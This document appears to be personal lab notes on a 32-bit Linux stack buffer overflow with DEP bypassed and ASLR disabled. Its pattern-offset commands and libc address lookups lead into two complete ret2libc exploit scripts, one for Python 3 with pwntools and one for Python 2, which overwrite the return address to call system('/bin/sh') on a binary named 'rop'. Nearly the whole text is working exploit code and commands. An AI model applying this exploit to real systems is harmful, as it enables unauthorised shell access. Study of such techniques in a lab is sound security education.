Linux Buffer overflow Data Execution Prevention(DEP) bypass with ASLR disabled

32-bit OS
gdb ropr Golu
/usr/bin/msf-pattern_create -l 100
r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
/usr/bin/msf-pattern_offset -q b7Ab -l 100
pattern_offset 0x41474141
r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
A value of 0 means ASLR is disabled:
cat /proc/sys/kernel/randomize_va_space
ldd rop
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i exit
strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
#!/usr/bin/python3
from pwn import *
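# Bytes needed to reach the saved return address of the vulnerable function
# (52 bytes of filler, then the four bytes that overwrite EIP - see the
# pattern_create / pattern_offset steps above).
junk = b'A' * 52

# Base address of libc.so.6 in the target process, read from `ldd rop`.
# Hard-coding it only works because randomize_va_space is 0: with ASLR
# enabled this base changes on every run and the fixed pointers below
# would miss, which is exactly the protection ASLR is meant to provide.
libc_addr = 0xb7e19000

# Offsets of system(), exit() and the "/bin/sh" string inside libc.so.6
# (from `readelf -s` and `strings -atx`), rebased onto libc_addr and packed
# as 32-bit little-endian pointers.
system_addr = p32(libc_addr + 0x0003ada0, endian='little')
exit_addr = p32(libc_addr + 0x0002e9d0, endian='little')
binsh_addr = p32(libc_addr + 0x0015ba0b, endian='little')

# Classic ret2libc frame: the overwritten return address points at system(),
# exit() sits where system() expects its own return address, and the
# "/bin/sh" pointer is system()'s first argument. No code on the stack is
# ever executed, which is why DEP alone does not stop this layout.
payload = junk + system_addr + exit_addr + binsh_addr

# Write the raw bytes for the shell invocation below; `with` guarantees the
# file is flushed and closed even if the write fails.
with open("payload.txt", "wb") as f:
    f.write(payload)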
/home/ayush/.binary/rop `cat payload.txt`
#!/usr/bin/python2
import struct
# Filler up to the saved return address of the vulnerable function.
junk = 'A' * 52

# Base of libc.so.6 in the target process (from `ldd rop`); only stable
# because ASLR (randomize_va_space) is switched off on this box.
libc_addr = 0xb7e19000

# Offsets of system(), exit() and the "/bin/sh" string inside libc.so.6
# (readelf -s / strings -atx), rebased and packed as little-endian dwords.
system_addr, exit_addr, binsh_addr = [
    struct.pack("<I", libc_addr + off)
    for off in (0x0003ada0, 0x0002e9d0, 0x0015ba0b)
]

# ret2libc layout: junk | system() | exit() as system's return | "/bin/sh" pointer.
payload_addr = ''.join([junk, system_addr, exit_addr, binsh_addr])
print payload_addr
